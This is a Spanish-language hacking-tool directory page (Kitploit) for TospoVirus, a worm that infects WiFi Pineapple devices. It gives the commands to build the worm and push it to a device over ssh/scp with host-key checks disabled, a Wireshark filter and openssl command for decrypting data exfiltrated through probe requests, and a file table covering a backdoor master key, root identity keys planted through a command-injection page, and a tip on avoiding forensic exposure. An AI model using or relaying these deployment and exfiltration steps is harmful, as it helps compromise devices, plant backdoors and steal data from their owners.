Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
TospoVirus — A WiFi Pineapple infecting worm. | Kitploit
Herramientas/GitHubGitHub/catatonicprime/tospovirus
Persistence MechanismsExploitationLateral MovementData ExfiltrationPost-ExploitationWireless SecurityCommand and ControlRemote Access Trojan
GitHubcatatonicprime/tospovirus

TospoVirus

A WiFi Pineapple infecting worm.

Ver Repositorio
174hace 11 añosAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

Compilación de TospoVirus para distribución:

./build.sh

Distribución a un pineapple funcional con la versión 2.3:

ssh -oStrictHostKeyChecking=no -oUserKnownHostsFile=/dev/null [email protected] "mkdir /tospo"
scp -oStrictHostKeyChecking=no -oUserKnownHostsFile=/dev/null dist/tv* [email protected]:/tospo/
Nota: Necesitará tener un dispositivo configurado O usar el módulo de metasploit para habilitar ssh

Descifrado de datos exfiltrados:

El filtro de wireshark es:
(wlan.fc.type_subtype == 0x04) && (wlan_mgt.tag.length == 32)
printf $(echo "[data copied from wireshark]" | sed -re 's/(..)/\\x\1/g') | openssl rsautl -decrypt -inkey tvd.pem

Opcionalmente, use el script harvest.py de la siguiente manera:
python harvest.py [monitor-iface]

Archivos y propósito:

ArchivoPropósito
tvEl virus en sí.
tvbdLa clave backdoor "maestra", no distribuya la clave privada.
tvdLa clave de divulgación, utilizada para exfiltrar datos mediante probe requests.
tospo_rsaLa clave privada de identidad, específica de cada dispositivo infectado, utilizada como clave de transferencia.
tospo_rsa.pubLa clave pública de identidad, transferida a través de la página de inyección de comandos para permitir que la identidad privada realice acciones como root en el dispositivo remoto.
wOpciones de configuración inalámbrica enviadas, utilizadas para restaurar conexiones anteriores.
nOpciones de configuración de red enviadas, utilizadas para restaurar conexiones anteriores.
Nota: Todos los archivos que comienzan con 'tv' se transfieren al infectar un nuevo dispositivo. No agregue claves privadas ni similares con nombres que comiencen con 'tv'; de lo contrario, su clave privada quedará expuesta al análisis forense.
Descargar herramienta